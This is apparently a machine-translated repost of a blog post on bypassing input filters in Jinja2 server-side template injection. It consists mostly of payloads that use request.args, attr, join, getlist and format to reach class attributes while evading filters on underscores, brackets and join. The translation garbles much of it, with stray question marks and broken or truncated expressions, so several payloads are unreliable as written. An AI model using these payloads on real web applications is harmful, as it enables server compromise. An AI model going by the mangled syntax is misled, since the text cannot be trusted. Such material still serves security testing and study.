Principle
is first template injection jinja2 Example:
{{Request [request.args.param]}} may be {{request | attr (request.args.param)alternative bypass "[", "]" filter
bypass way that is synonymous sentence conversion, other substitutions are given below to bypass the "_" character:
? = exp {{Request | attr ([request.args.usc * 2, request.args.class, request.args. usc * 2] | join)}
is equivalent to exp = {{request |? attr
is equivalent to? exp = {{request | attr (
is equivalent to exp =? {{request | attr
is equivalent to exp = {{? request .__ class__}}
are given below of some bypass posture, if the page itself to exploit implantation parameters, to statements like injected class__ is .__ Request
① bypass "]", "[",keywords such
use tuple () and by passing additional parameters
exploit = {{request |? attr
using .getlist () optimization (to bypass, "")
{{Request | attr (request.args.getlist (request.args.l) | the Join)}} & L = A & A = _ & A = _ & A = class & A = _ & A = _
② bypass "| join"
Use | format functions, by incoming format string% s, and then pass the character to be replaced
exploit = {{request |? attr (request.args.f | format (request.args.a, request.args.a, request.args.a , request.args.a) | the Join
)}} = F & sclass is% S%%% S & S A = _
python SSTI bypass
Guess you like
Origin www.cnblogs.com/cimuhuashuimu/p/11544445.html
Recommended
Ranking